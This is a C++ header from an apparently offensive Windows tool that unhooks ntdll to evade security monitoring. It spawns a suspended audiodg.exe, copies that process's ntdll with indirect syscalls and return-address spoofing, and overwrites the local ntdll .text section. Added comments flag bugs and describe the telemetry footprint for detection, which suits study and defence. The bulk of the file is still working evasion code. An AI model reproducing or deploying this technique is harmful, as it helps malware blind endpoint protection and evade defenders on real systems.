// This header file uses indirect syscalls to unhook ntdll from a suspended process
#pragma once
#include "functions.h"
#include "resolvers.h"
#include "ntprocessapi.h"
#include "retaddrspoof.h"
extern PVOID Gdgt;
// Returns the SizeOfImage value from the optional header of the ntdll image
// mapped into the current process, or 0 (spelled NULL) when the DOS or NT
// signature at the module base does not match.
// The base is resolved through the project's GetLoadedDllHandleH helper from a
// hard-coded hash; the inline comment says that hash denotes ntdll, which is
// not verifiable from this file. Mismatches are reported on std::cout only.
DWORD GetImageSizeFromBase() {
    HMODULE BASE = GetLoadedDllHandleH(776560387); // Getting NTDLL BASE By Hash
    uintptr_t base = reinterpret_cast<uintptr_t>(BASE);
    PIMAGE_DOS_HEADER pdos = (PIMAGE_DOS_HEADER)base;
    // NOTE(review): BASE is dereferenced here without a NULL check; the helper's
    // behaviour when the hash is not found is not visible in this file.
    if (pdos->e_magic != IMAGE_DOS_SIGNATURE) {
        std::cout << "IMAGE_DOS_SIGNATURE MISMATCH\n";
        return NULL;
    }
    PIMAGE_NT_HEADERS pntheaders = (PIMAGE_NT_HEADERS)(pdos->e_lfanew + base); // getting the nt headers using its rva
    if (pntheaders->Signature != IMAGE_NT_SIGNATURE) {
        std::cout << "IMAGE_NT_SIGNATURE MISMATCH\n";
        return NULL;
    }
    return pntheaders->OptionalHeader.SizeOfImage;
}
// Copies the ntdll image as mapped in a freshly created child process into a
// heap buffer and hands that buffer to the caller through BUFFER.
// Observable sequence, in order:
//   1. A child process (\??\C:\Windows\System32\audiodg.exe) is created in the
//      suspended state with the project's NtCreateUserSuspendedProcess.
//   2. sizeofheap bytes starting at the *local* ntdll base are read out of the
//      child with an NtReadVirtualMemory syscall issued through RetSpoofCall
//      (return-address spoofing; Gdgt is the gadget declared extern above).
//   3. The child is terminated with NtTerminateProcess.
// Ownership: the buffer comes from malloc and the caller owns it afterwards.
// Error handling: every failure is only printed to std::cout and execution
// continues with whatever handle/buffer was obtained; a 0 result from
// GetImageSizeFromBase is not checked either.
// Detection note: "suspended process created -> cross-process read of the
// ntdll range -> process terminated without ever running" is the footprint of
// this routine; process-creation and cross-process memory-read telemetry
// correlated on the child PID surfaces it.
VOID ReadBufferFromProcess(OUT PBYTE* BUFFER) {
    DWORD sizeofheap = GetImageSizeFromBase();
    HMODULE BASE = GetLoadedDllHandleH(776560387);
    // Temporarily Create a process
    HANDLE hProcess = nullptr;
    HANDLE hThread = nullptr;
    NTSTATUS status = NtCreateUserSuspendedProcess(L"\\??\\C:\\Windows\\System32\\audiodg.exe", &hProcess, &hThread);
    // Creation failure is logged but does not abort; the read below then runs
    // against whatever hProcess holds.
    if (status != ERROR_SUCCESS || hProcess == NULL || hProcess == INVALID_HANDLE_VALUE || hThread == NULL || hThread == INVALID_HANDLE_VALUE) { // gotta be sure tho xD
        std::cout << "Process Creation Error: " << std::hex << status << "\n";
    }
    PBYTE bufferMemory = (PBYTE)malloc((SIZE_T)sizeofheap);
    RtlSecureZeroMemory(bufferMemory, sizeofheap);
    SIZE_T lpNumberOfBytesRead = 0;
    // Same base address is used in both processes; the read relies on ntdll
    // being mapped at the same address in the child (not checked here).
    status = (NTSTATUS)RetSpoofCall(SysNtReadVirtualMemory, 5, Gdgt, hProcess, BASE, bufferMemory, sizeofheap, &lpNumberOfBytesRead);
    if (status != ERROR_SUCCESS) {
        std::cout << "Read Error: " << std::hex << status << "\n";
    }
    *BUFFER = bufferMemory;
    //free(bufferMemory);
    // status = reinterpret_cast<NTSTATUS>(RetSpoofCall((void*)SysNtTerminateProcess, 2, Gdgt, hProcess, 0));
    // hThread is never closed; only the process handle is used from here on.
    status = reinterpret_cast<NTSTATUS>(RetSpoofCall((void*)SysNtTerminateProcess, 2, Gdgt, hProcess, 0));
    if (status != ERROR_SUCCESS) {
        std::cout << "Termination Error: " << std::hex << status << "\n";
    }
}
/// <summary>
/// Performs NTDLL unhooking from a suspended process using return address spoofing and indirect syscalls.
/// Steps visible in this function: obtain a copy of ntdll from a child process
/// (ReadBufferFromProcess), locate the ".text" section header of the local ntdll,
/// change that range's protection to PAGE_EXECUTE_WRITECOPY via NtProtectVirtualMemory
/// (issued through RetSpoofCall), memcpy the copied section over the local one,
/// restore the previous protection and release the buffer.
/// Errors are printed to std::cout and abort the function after the first
/// failing protection call; the buffer is not released on those paths.
/// Detection note: the footprint is a protection change on ntdll's .text in the
/// current process followed by a write into an image-backed executable region;
/// re-verifying ntdll .text against the on-disk image is the integrity check that
/// exposes the result.
/// </summary>
/// <returns></returns>
VOID FlushNTDLL() {
    PVOID LOCAL_SECTION = NULL,
    REMOTE_SECTION = NULL;
    // NOTE(review): SECTION_SIZE is left uninitialized; it is only assigned when a
    // ".text" section is found in the loop below.
    SIZE_T SECTION_SIZE;
    PBYTE clean_buffer = nullptr;
    ReadBufferFromProcess(&clean_buffer);
    HMODULE BASE = GetLoadedDllHandleH(776560387);
    uintptr_t base = reinterpret_cast<uintptr_t>(BASE);
    PIMAGE_DOS_HEADER pdos = (PIMAGE_DOS_HEADER)base;
    if (pdos->e_magic != IMAGE_DOS_SIGNATURE) {
        std::cout << "IMAGE_DOS_SIGNATURE MISMATCH\n";
        return;
    }
    PIMAGE_NT_HEADERS pntheaders = (PIMAGE_NT_HEADERS)(pdos->e_lfanew + base); // getting the nt headers using its rva
    if (pntheaders->Signature != IMAGE_NT_SIGNATURE) {
        std::cout << "IMAGE_NT_SIGNATURE MISMATCH\n";
        return;
    }
    PIMAGE_SECTION_HEADER SECTIONS_ENTRY = IMAGE_FIRST_SECTION(pntheaders);
    // Both the local and the copied image are addressed with the same section
    // RVA; the copy is assumed to have the same layout as the local image.
    for (int i = 0; i < pntheaders->FileHeader.NumberOfSections; i++) {
        //std::cout << (CHAR*)SECTIONS_ENTRY[i].Name << std::endl;
        if (strcmp((CHAR*)SECTIONS_ENTRY[i].Name, ".text") == 0) {
            LOCAL_SECTION = (PVOID)(base + SECTIONS_ENTRY[i].VirtualAddress);
            REMOTE_SECTION = (PVOID)(clean_buffer + SECTIONS_ENTRY[i].VirtualAddress);
            SECTION_SIZE = SECTIONS_ENTRY[i].Misc.VirtualSize;
        }
    }
    DWORD old_protect;
    // LOCAL_SECTION/SECTION_SIZE are passed by address and may be rounded by the
    // kernel to page granularity; the adjusted values are reused for the restore.
    NTSTATUS status = reinterpret_cast<NTSTATUS>(RetSpoofCall((void*)SysNtProtectVirtualMemory, 5, Gdgt, SELF_HANDLE, &LOCAL_SECTION, &SECTION_SIZE, PAGE_EXECUTE_WRITECOPY, &old_protect));
    if (status != ERROR_SUCCESS) { std::cout << "Protection 1 Error: " << std::hex << status << "\n"; return; }
    RetSpoofCall((void*)memcpy, 3, Gdgt ,LOCAL_SECTION, REMOTE_SECTION, (SIZE_T)SECTION_SIZE);
    status = reinterpret_cast<NTSTATUS>(RetSpoofCall((void*)SysNtProtectVirtualMemory, 5, Gdgt, SELF_HANDLE, &LOCAL_SECTION, &SECTION_SIZE, old_protect, &old_protect));
    if (status != ERROR_SUCCESS) { std::cout << "Protection 2 Error: " << std::hex << status << "\n"; return; }
#ifdef _DEBUG_PRINT
    std::cout << "[DEBUG] UNHOOKED NTDLL!\n";
#endif
    // NOTE(review): clean_buffer was allocated with malloc in ReadBufferFromProcess
    // but is released with delete[] here (mismatched allocator).
    delete[] clean_buffer;
    return;
}